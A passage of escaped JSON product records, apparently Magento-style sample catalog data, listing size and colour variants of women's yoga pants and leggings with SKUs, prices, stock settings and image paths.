"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1770\":{\"sku\":\"WP01-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-29-Gray\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1771\":{\"sku\":\"WP01-29-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-29-White\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-29-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"White\"},\"1772\":{\"sku\":\"WP01\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Sweatpants,material=CoolTech&trade;|Organic Cotton,pattern=Solid,climate=Indoor|Mild,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP01-28-Black,size=28,color=Black|sku=WP01-28-Gray,size=28,color=Gray|sku=WP01-28-White,size=28,color=White|sku=WP01-29-Black,size=29,color=Black|sku=WP01-29-Gray,size=29,color=Gray|sku=WP01-29-White,size=29,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Sweatpants\",\"material\":\"CoolTech&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Mild\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1773\":{\"sku\":\"WP02-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-28-Blue\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1774\":{\"sku\":\"WP02-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-28-Purple\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1775\":{\"sku\":\"WP02-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-28-Red\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1776\":{\"sku\":\"WP02-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-29-Blue\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1777\":{\"sku\":\"WP02-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-29-Purple\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1778\":{\"sku\":\"WP02-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings-29-Red\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"emma-leggings-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_c